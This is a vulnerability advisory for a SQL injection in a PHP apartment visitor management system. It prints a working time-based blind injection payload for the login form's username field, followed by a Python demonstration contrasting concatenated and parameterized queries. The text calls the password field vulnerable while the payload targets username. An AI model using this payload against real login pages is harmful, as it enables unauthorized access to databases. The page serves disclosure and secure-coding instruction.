CVE-2022-2677: CVE_demo/Apartment Visitor Management System-SQL injections.md at main · anx0ing/CVE_demo

A vulnerability was found in SourceCodester Apartment Visitor Management System 1.0. It has been classified as critical. This affects an unknown part of the file index.php. The manipulation of the argument username with the input ' AND (SELECT 4955 FROM (SELECT(SLEEP(5)))RSzF) AND 'htiy'='htiy leads to SQL injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-205665 was assigned to this vulnerability.


Apartment Visitor Management System-SQL injections

Date: 2022-08/06

Exploit Author: [email protected]

Vendor Homepage: https://www.sourcecodester.com

Software Link: https://www.sourcecodester.com/php-apartment-visitor-management-system-source-code

Version: 1.0

/index.php

password parameters have SQL injections

POC

login=&password=admin123&username=' AND (SELECT 4955 FROM (SELECT(SLEEP(5)))RSzF) AND 'htiy'='htiy
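
The PoC request above, run through a concatenated and a parameterized login query. This is an added example, not the application's code: SQLite stands in for the MySQL backend, SLEEP is a no-op stub, and the users table and both queries are assumptions, since the page does not show index.php.

```python
import sqlite3
from urllib.parse import parse_qs

# Request body from the PoC above.
POC_BODY = ("login=&password=admin123&username=' AND (SELECT 4955 FROM "
            "(SELECT(SLEEP(5)))RSzF) AND 'htiy'='htiy")


def functions_reaching_sql(body, parameterized):
    """Run a login lookup for one POST body; return the SQL functions the engine compiled."""
    form = parse_qs(body, keep_blank_values=True)
    username = form.get("username", [""])[0]
    password = form.get("password", [""])[0]

    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")  # assumed schema
    db.create_function("SLEEP", 1, lambda seconds: 0)  # no-op stand-in for MySQL SLEEP()

    seen = []

    def authorizer(action, arg1, arg2, db_name, source):
        # SQLite calls this while compiling a statement, for each function it references.
        if action == sqlite3.SQLITE_FUNCTION:
            seen.append((arg2 or arg1 or "").lower())
        return sqlite3.SQLITE_OK

    db.set_authorizer(authorizer)
    if parameterized:
        # Hardened: values are bound after parsing, so they cannot become SQL syntax.
        db.execute("SELECT 1 FROM users WHERE username = ? AND password = ?",
                   (username, password)).fetchall()
    else:
        # Vulnerable pattern: request values concatenated into the statement text.
        db.execute("SELECT 1 FROM users WHERE username = '" + username +
                   "' AND password = '" + password + "'").fetchall()
    db.close()
    return seen


if __name__ == "__main__":
    print("concatenated :", functions_reaching_sql(POC_BODY, parameterized=False))
    print("parameterized:", functions_reaching_sql(POC_BODY, parameterized=True))
```

With concatenation the username value is compiled as SQL and the SLEEP call reaches the engine; with bound parameters the same value is only compared as a string.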
